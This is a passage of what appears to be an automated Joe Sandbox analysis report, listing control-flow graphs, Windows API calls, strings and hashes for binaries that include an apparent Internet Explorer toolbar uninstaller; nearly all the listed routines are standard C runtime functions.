__alloca_probe_16 4386->4391 4392 8454b5 _malloc 66 API calls 4386->4392 4387->4368 4394 846378 LCMapStringA 4387->4394 4388->4387 4389->4390 4393 845446 __freea 66 API calls 4390->4393 4391->4371 4391->4385 4392->4391 4393->4371 4396 846394 4394->4396 4397 846398 4394->4397 4399 845446 __freea 66 API calls 4396->4399 4398 846b63 ___convertcp 73 API calls 4397->4398 4398->4396 4399->4368 3909 841281 3912 84283c 3909->3912 3911 841286 3911->3911 3913 842861 3912->3913 3914 84286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3912->3914 3913->3914 3915 842865 3913->3915 3914->3915 3915->3911 4400 841242 4401 841257 4400->4401 4402 841251 4400->4402 4406 8416bc 4401->4406 4403 841697 _abort 66 API calls 4402->4403 4403->4401 4405 84125c __freefls@4 4407 841555 _doexit 66 API calls 4406->4407 4408 8416c7 4407->4408 4408->4405 3916 84458d 3919 8429c6 LeaveCriticalSection 3916->3919 3918 844594 3919->3918 3979 84122e 3982 8418fe 3979->3982 3983 8422cc __getptd_noexit 66 API calls 3982->3983 3984 84123f 3983->3984 4409 8467c8 RtlUnwind 3985 8431b4 3986 8431c0 SetLastError 3985->3986 3987 8431c8 __freefls@4 3985->3987 3986->3987 3988 8426b0 3989 8426dc 3988->3989 3990 8426e9 3988->3990 3991 8410cc __except_handler4 5 API calls 3989->3991 3992 8410cc __except_handler4 5 API calls 3990->3992 3991->3990 3996 8426f9 __except_handler4 __IsNonwritableInCurrentImage 3992->3996 3993 84277c 3994 842752 __except_handler4 3994->3993 3995 84276c 3994->3995 3997 8410cc __except_handler4 5 API calls 3994->3997 3998 8410cc __except_handler4 5 API calls 3995->3998 3996->3993 3996->3994 4004 8451ca RtlUnwind 3996->4004 3997->3995 3998->3993 4000 8427cb __except_handler4 4001 8427ff 4000->4001 4002 8410cc __except_handler4 5 API calls 4000->4002 4003 8410cc __except_handler4 5 API calls 4001->4003 4002->4001 4003->3994 4004->4000 3920 841391 3921 8413cd 3920->3921 3922 8413a3 3920->3922 3922->3921 3924 8428da 3922->3924 3925 8428e6 
__freefls@4 3924->3925 3930 842345 3925->3930 3931 8422cc __getptd_noexit 66 API calls 3930->3931 3932 84234d 3931->3932 3933 84235a 3932->3933 3934 841411 __amsg_exit 66 API calls 3932->3934 3935 8451fb 3933->3935 3934->3933 3936 845221 3935->3936 3937 84521a 3935->3937 3947 842f92 3936->3947 3938 841719 __NMSG_WRITE 66 API calls 3937->3938 3938->3936 3941 845232 __setmbcp_nolock 3943 84530a 3941->3943 3946 8452ca SetUnhandledExceptionFilter UnhandledExceptionFilter 3941->3946 3971 841697 3943->3971 3946->3943 3948 8420f9 __decode_pointer 6 API calls 3947->3948 3949 842f9d 3948->3949 3949->3941 3950 842f9f 3949->3950 3954 842fab __freefls@4 3950->3954 3951 843007 3952 842fe8 3951->3952 3957 843016 3951->3957 3956 8420f9 __decode_pointer 6 API calls 3952->3956 3953 842fd2 3955 8422cc __getptd_noexit 66 API calls 3953->3955 3954->3951 3954->3952 3954->3953 3958 842fce 3954->3958 3959 842fd7 _siglookup 3955->3959 3956->3959 3960 842c72 strtoxl 66 API calls 3957->3960 3958->3953 3958->3957 3963 84307d 3959->3963 3964 841697 _abort 66 API calls 3959->3964 3970 842fe0 __freefls@4 3959->3970 3961 84301b 3960->3961 3962 842c0a strtoxl 6 API calls 3961->3962 3962->3970 3965 842aa0 __lock 66 API calls 3963->3965 3966 843088 3963->3966 3964->3963 3965->3966 3967 8420f0 __init_pointers 6 API calls 3966->3967 3968 8430bd 3966->3968 3967->3968 3974 843113 3968->3974 3970->3941 3972 841555 _doexit 66 API calls 3971->3972 3973 8416a8 3972->3973 3975 843120 3974->3975 3976 843119 3974->3976 3975->3970 3978 8429c6 LeaveCriticalSection 3976->3978 3978->3975 4005 84543d 4006 841411 __amsg_exit 66 API calls 4005->4006 4007 845444 4006->4007 4458 8428fe 4459 842901 4458->4459 4460 8451fb _abort 68 API calls 4459->4460 4461 84290d __freefls@4 4460->4461 4008 842d3f 4009 843730 __calloc_crt 66 API calls 4008->4009 4010 842d4b 4009->4010 4011 84207e __encode_pointer 6 API calls 4010->4011 4012 842d53 4011->4012 4410 84235f 4412 84236b __freefls@4 4410->4412 4411 842383 4415 8435ee 
___free_lconv_mon 66 API calls 4411->4415 4416 842391 4411->4416 4412->4411 4413 8435ee ___free_lconv_mon 66 API calls 4412->4413 4414 84246d __freefls@4 4412->4414 4413->4411 4415->4416 4417 8435ee ___free_lconv_mon 66 API calls 4416->4417 4418 84239f 4416->4418 4417->4418 4419 8423ad 4418->4419 4420 8435ee ___free_lconv_mon 66 API calls 4418->4420 4421 8423bb 4419->4421 4422 8435ee ___free_lconv_mon 66 API calls 4419->4422 4420->4419 4423 8423c9 4421->4423 4424 8435ee ___free_lconv_mon 66 API calls 4421->4424 4422->4421 4425 8423d7 4423->4425 4426 8435ee ___free_lconv_mon 66 API calls 4423->4426 4424->4423 4427 8423e8 4425->4427 4428 8435ee ___free_lconv_mon 66 API calls 4425->4428 4426->4425 4429 842aa0 __lock 66 API calls 4427->4429 4428->4427 4430 8423f0 4429->4430 4431 842415 4430->4431 4432 8423fc InterlockedDecrement 4430->4432 4446 842479 4431->4446 4432->4431 4433 842407 4432->4433 4433->4431 4436 8435ee ___free_lconv_mon 66 API calls 4433->4436 4436->4431 4437 842aa0 __lock 66 API calls 4438 842429 4437->4438 4439 84245a 4438->4439 4440 843d2d ___removelocaleref 8 API calls 4438->4440 4449 842485 4439->4449 4444 84243e 4440->4444 4443 8435ee ___free_lconv_mon 66 API calls 4443->4414 4444->4439 4445 843b55 ___freetlocinfo 66 API calls 4444->4445 4445->4439 4452 8429c6 LeaveCriticalSection 4446->4452 4448 842422 4448->4437 4453 8429c6 LeaveCriticalSection 4449->4453 4451 842467 4451->4443 4452->4448 4453->4451 4013 845138 4014 84514a 4013->4014 4016 845158 @_EH4_CallFilterFunc@8 4013->4016 4015 8410cc __except_handler4 5 API calls 4014->4015 4015->4016

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00841006
                                                                                                                • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00841013
                                                                                                                • GetLastError.KERNEL32 ref: 0084101F
                                                                                                                • GetCommandLineW.KERNEL32(?), ref: 00841040
                                                                                                                • CommandLineToArgvW.SHELL32(00000000), ref: 00841047
                                                                                                                • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00841061
                                                                                                                • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00841073
                                                                                                                • LoadLibraryW.KERNELBASE(?), ref: 00841085
                                                                                                                • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00841097
                                                                                                                • FreeLibrary.KERNELBASE(00000000), ref: 008410A4
                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 008410AB
                                                                                                                • CoUninitialize.COMBASE ref: 008410B1
                                                                                                                • LocalFree.KERNEL32(00000000), ref: 008410BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                                                                                • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll$^Iu
                                                                                                                • API String ID: 474438367-586191020
                                                                                                                • Opcode ID: 823b47c8ba7deb10478af2dc27ecb4dd4bede7211f44b5b6d7adea90dc13d1fe
                                                                                                                • Instruction ID: 4a258ef55dc77f8b0c669675b56c6a5fecb26fedf7943603c76506f3c39fc933
                                                                                                                • Opcode Fuzzy Hash: 823b47c8ba7deb10478af2dc27ecb4dd4bede7211f44b5b6d7adea90dc13d1fe
                                                                                                                • Instruction Fuzzy Hash: D111B136605A6DEB8B30ABA0AC0CA9F3798FA577557000525F586D2150EF758885C7B2

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 16 841465-841476 call 84143a ExitProcess
                                                                                                                APIs
                                                                                                                • ___crtCorExitProcess.LIBCMT ref: 0084146D
                                                                                                                  • Part of subcall function 0084143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00841472,?,?,008454EE,000000FF,0000001E,?,008436FC,?,00000001,?,?,00842A2A,00000018), ref: 00841444
                                                                                                                  • Part of subcall function 0084143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00841454
                                                                                                                • ExitProcess.KERNEL32 ref: 00841476
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                • String ID:
                                                                                                                • API String ID: 2427264223-0
                                                                                                                • Opcode ID: 44bf871e21cb785f110293a716ce7449dc1d14f847af6a50dc66a0ba943e8247
                                                                                                                • Instruction ID: df7384bcfe3bdd05eb90f71801982994b7a7ff3e4f2d1ec97a778a6d4fbd19b9
                                                                                                                • Opcode Fuzzy Hash: 44bf871e21cb785f110293a716ce7449dc1d14f847af6a50dc66a0ba943e8247
                                                                                                                • Instruction Fuzzy Hash: 6AB0483100010CBB9B022F16DC0A84D7F2AFA813A0B608021F808890619E72A9929A95

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 19 84261b-84263d HeapCreate 20 842641-84264a 19->20 21 84263f-842640 19->21
                                                                                                                APIs
                                                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00842630
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 10892065-0
                                                                                                                • Opcode ID: bf4f2bb38f1eea3fadf16a23b68714d6cdf8fa2fa1cda5af80a74df4ba06a6fd
                                                                                                                • Instruction ID: 1f0990d0084b6a06ab4bd139daaa7508fb791e9c564e322250448004f573816f
                                                                                                                • Opcode Fuzzy Hash: bf4f2bb38f1eea3fadf16a23b68714d6cdf8fa2fa1cda5af80a74df4ba06a6fd
                                                                                                                • Instruction Fuzzy Hash: 19D05E3A5583489EDB105F716C087263BDCE385399F104475B90CC6150E674C590DE04

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 22 841681-84168d call 841555 24 841692-841696 22->24
                                                                                                                APIs
                                                                                                                • _doexit.LIBCMT ref: 0084168D
                                                                                                                  • Part of subcall function 00841555: __lock.LIBCMT ref: 00841563
                                                                                                                  • Part of subcall function 00841555: __decode_pointer.LIBCMT ref: 0084159A
                                                                                                                  • Part of subcall function 00841555: __decode_pointer.LIBCMT ref: 008415AF
                                                                                                                  • Part of subcall function 00841555: __decode_pointer.LIBCMT ref: 008415D9
                                                                                                                  • Part of subcall function 00841555: __decode_pointer.LIBCMT ref: 008415EF
                                                                                                                  • Part of subcall function 00841555: __decode_pointer.LIBCMT ref: 008415FC
                                                                                                                  • Part of subcall function 00841555: __initterm.LIBCMT ref: 0084162B
                                                                                                                  • Part of subcall function 00841555: __initterm.LIBCMT ref: 0084163B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 1597249276-0
                                                                                                                • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                • Instruction ID: 9caf5a6bc66e1b0b89e83e64f1b3a14811d6fe7ff057d264f2b0ad51cdf14e58
                                                                                                                • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                • Instruction Fuzzy Hash: 98B0923258020C33DB20258AAC07F467A0997C0BA0F260020FA0C191E1A9A2A9A1808A

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00841346
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0084135B
                                                                                                                • UnhandledExceptionFilter.KERNEL32(0084816C), ref: 00841366
                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00841382
                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00841389
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 2579439406-0
                                                                                                                • Opcode ID: c82d63d8217bd2ca36315ce41c185385c313fbfbd664b130d71ea43aea8b118b
                                                                                                                • Instruction ID: 2acb48f06fafb4ed6c737ac684314037f5fd152fd073707a2b7dc49825feb186
                                                                                                                • Opcode Fuzzy Hash: c82d63d8217bd2ca36315ce41c185385c313fbfbd664b130d71ea43aea8b118b
                                                                                                                • Instruction Fuzzy Hash: 2E21F2BC891704DFE758DF69FD847087BB4FB0A302F40402AE5088BA61EB795884CF46

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00849458,0000000C,00842320,00000000,00000000,?,0084174F,00000003,?,?,?,?,?,?,008410F6), ref: 008421F7
                                                                                                                • __crt_waiting_on_module_handle.LIBCMT ref: 00842202
                                                                                                                  • Part of subcall function 008413E1: Sleep.KERNEL32(000003E8,00000000,?,00842148,KERNEL32.DLL,?,00842194,?,0084174F,00000003), ref: 008413ED
                                                                                                                  • Part of subcall function 008413E1: GetModuleHandleW.KERNEL32(?,?,00842148,KERNEL32.DLL,?,00842194,?,0084174F,00000003,?,?,?,?,?,?,008410F6), ref: 008413F6
                                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0084222B
                                                                                                                • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0084223B
                                                                                                                • __lock.LIBCMT ref: 0084225D
                                                                                                                • InterlockedIncrement.KERNEL32(0084A4D8), ref: 0084226A
                                                                                                                • __lock.LIBCMT ref: 0084227E
                                                                                                                • ___addlocaleref.LIBCMT ref: 0084229C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                • API String ID: 1028249917-2843748187
                                                                                                                • Opcode ID: 023ac31e1b4a7894c2dc6a7e3a1bc3188c5aff9d6b59cc9f580d5f558916d504
                                                                                                                • Instruction ID: a604ce6645a8269d0ccdb8983bf53bec6dbf100dd2af82128834c5736a1dc75e
                                                                                                                • Opcode Fuzzy Hash: 023ac31e1b4a7894c2dc6a7e3a1bc3188c5aff9d6b59cc9f580d5f558916d504
                                                                                                                • Instruction Fuzzy Hash: 14118C70944B09DED720AF69D845B5EFBE0FF14320F604559F4A9E72A0CBB49A44CB26

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 170 8440a0-8440bb call 84264c call 842345 175 8440bd-8440c1 170->175 176 8440da-8440f2 call 842aa0 170->176 175->176 178 8440c3 175->178 183 8440f4-8440f6 176->183 184 84412a-844136 call 84413b 176->184 179 8440c6-8440c8 178->179 181 8440d2-8440d9 call 842691 179->181 182 8440ca-8440d1 call 841411 179->182 182->181 188 844112-844124 InterlockedIncrement 183->188 189 8440f8-844101 InterlockedDecrement 183->189 184->179 188->184 189->188 193 844103-844109 189->193 193->188 194 84410b-844111 call 8435ee 193->194 194->188
                                                                                                                APIs
                                                                                                                • __getptd.LIBCMT ref: 008440AC
                                                                                                                  • Part of subcall function 00842345: __getptd_noexit.LIBCMT ref: 00842348
                                                                                                                  • Part of subcall function 00842345: __amsg_exit.LIBCMT ref: 00842355
                                                                                                                • __amsg_exit.LIBCMT ref: 008440CC
                                                                                                                • __lock.LIBCMT ref: 008440DC
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 008440F9
                                                                                                                • InterlockedIncrement.KERNEL32(02D52B08), ref: 00844124
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 4271482742-0
                                                                                                                • Opcode ID: f829a629c4c0604149a3af3fa1c6c1b096d63e2e388b8862288e588ce61d0e30
                                                                                                                • Instruction ID: f3ebe6b74256be28d510892e4bcd99904f51260ccb6fcc5157e624d49f7b77bd
                                                                                                                • Opcode Fuzzy Hash: f829a629c4c0604149a3af3fa1c6c1b096d63e2e388b8862288e588ce61d0e30
                                                                                                                • Instruction Fuzzy Hash: 52012E32901A2DEBDB25AF28880A34DBB60FF04720F014005F900EB291DB34AD91CFD6

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 197 8435ee-8435ff call 84264c 200 843676-84367b call 842691 197->200 201 843601-843608 197->201 202 84364d 201->202 203 84360a-843622 call 842aa0 call 8445e4 201->203 205 84364e-84365e HeapFree 202->205 215 843624-84362c call 844614 203->215 216 84362d-84363d call 843644 203->216 205->200 208 843660-843675 call 842c72 GetLastError call 842c30 205->208 208->200 215->216 216->200 222 84363f-843642 216->222 222->205
                                                                                                                APIs
                                                                                                                • __lock.LIBCMT ref: 0084360C
                                                                                                                  • Part of subcall function 00842AA0: __mtinitlocknum.LIBCMT ref: 00842AB6
                                                                                                                  • Part of subcall function 00842AA0: __amsg_exit.LIBCMT ref: 00842AC2
                                                                                                                  • Part of subcall function 00842AA0: EnterCriticalSection.KERNEL32(?,?,?,00845600,00000004,00849628,0000000C,00843746,?,?,00000000,00000000,00000000,?,008422F7,00000001), ref: 00842ACA
                                                                                                                • ___sbh_find_block.LIBCMT ref: 00843617
                                                                                                                • ___sbh_free_block.LIBCMT ref: 00843626
                                                                                                                • HeapFree.KERNEL32(00000000,?,00849568,0000000C,00842A81,00000000,008494C8,0000000C,00842ABB,?,?,?,00845600,00000004,00849628,0000000C), ref: 00843656
                                                                                                                • GetLastError.KERNEL32(?,00845600,00000004,00849628,0000000C,00843746,?,?,00000000,00000000,00000000,?,008422F7,00000001,00000214), ref: 00843667
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714421763-0
                                                                                                                • Opcode ID: 9ae9b57d069d25ef7432f9e4ddd612503a3c22eebdd6bdc64078f05f396d3dbc
                                                                                                                • Instruction ID: 8257838c1c94194b54fdf8ef07782e5c9099e48c90784920703022d3b499aeaf
                                                                                                                • Opcode Fuzzy Hash: 9ae9b57d069d25ef7432f9e4ddd612503a3c22eebdd6bdc64078f05f396d3dbc
                                                                                                                • Instruction Fuzzy Hash: E8016275D0830EBAEB207B759C06B5E3664FF31764FA24149F444E62D1DF388A40EA5A

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 223 843e04-843e1f call 84264c call 842345 228 843e21-843e25 223->228 229 843e43-843e6c call 842aa0 call 843dc6 call 843e6e 223->229 228->229 231 843e27-843e2c call 842345 228->231 237 843e2f-843e31 229->237 231->237 239 843e33-843e3a call 841411 237->239 240 843e3b-843e42 call 842691 237->240 239->240
                                                                                                                APIs
                                                                                                                • __getptd.LIBCMT ref: 00843E10
                                                                                                                  • Part of subcall function 00842345: __getptd_noexit.LIBCMT ref: 00842348
                                                                                                                  • Part of subcall function 00842345: __amsg_exit.LIBCMT ref: 00842355
                                                                                                                • __getptd.LIBCMT ref: 00843E27
                                                                                                                • __amsg_exit.LIBCMT ref: 00843E35
                                                                                                                • __lock.LIBCMT ref: 00843E45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000002C.00000002.2617502298.0000000000841000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00840000, based on PE: true
                                                                                                                • Associated: 0000002C.00000002.2617471704.0000000000840000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617568501.000000000084A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                • Associated: 0000002C.00000002.2617599785.000000000084C000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_44_2_840000_Rpe5Ig0.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3521780317-0
                                                                                                                • Opcode ID: 972223243c4e8ae913798cc5d5b8fbbc74bd2e8f209c2285aefe4449fed4a516
                                                                                                                • Instruction ID: 543f463712e6d3e349933615af7d5a6060233e78e9f00a52e77bff8bfe9d3bab
                                                                                                                • Opcode Fuzzy Hash: 972223243c4e8ae913798cc5d5b8fbbc74bd2e8f209c2285aefe4449fed4a516
                                                                                                                • Instruction Fuzzy Hash: 2DF0673294931C8BE720EB78880A74D72A0FF54B60F914189F451EBAA2CB749A41CB57

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:0.5%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:4.2%
                                                                                                                Total number of Nodes:214
                                                                                                                Total number of Limit Nodes:5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 125 421c40-421c58 call 4231d1 128 421c5a-421c73 call 4231d7 125->128 129 421c7c-421c82 125->129 132 421c83-421c8a 128->132 133 421c75-421c77 call 4d706d 128->133 135 421c90-421ca2 call 4271fa 132->135 133->129 138 421ca4-421cb3 call 4231dd 135->138 139 421cc5-421cd4 call 4d5b7a 135->139 138->135 144 421cb5-421cb7 call 48b328 138->144 146 421cbc-421cc4 144->146
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000030.00000002.3347729487.0000000000421000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00420000, based on PE: true
                                                                                                                • Associated: 00000030.00000002.3347685742.0000000000420000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347770061.0000000000434000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347793238.000000000043C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347833027.0000000000472000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3348062669.0000000000504000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3348281438.0000000000688000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_48_2_420000_53jGFr5v.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID: P]U
                                                                                                                • API String ID: 2538663250-2336967863
                                                                                                                • Opcode ID: 43de0fcac3a35f1e6787865db976a63f2db9bb5e38596c544f81196cb5d80e3e
                                                                                                                • Instruction ID: 399fe605e05182ab4977dabc91cd780db95a4767c235d0a9e5b4adce59d241f8
                                                                                                                • Opcode Fuzzy Hash: 43de0fcac3a35f1e6787865db976a63f2db9bb5e38596c544f81196cb5d80e3e
                                                                                                                • Instruction Fuzzy Hash: D601BE2170123C36DB2076B67C49EFFB69CDF06358F40019BFC08D3251E6689D1546E9

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • ___scrt_release_startup_lock.LIBCMT ref: 0042333A
                                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 0042334E
                                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00423374
                                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 004233B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000030.00000002.3347729487.0000000000421000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00420000, based on PE: true
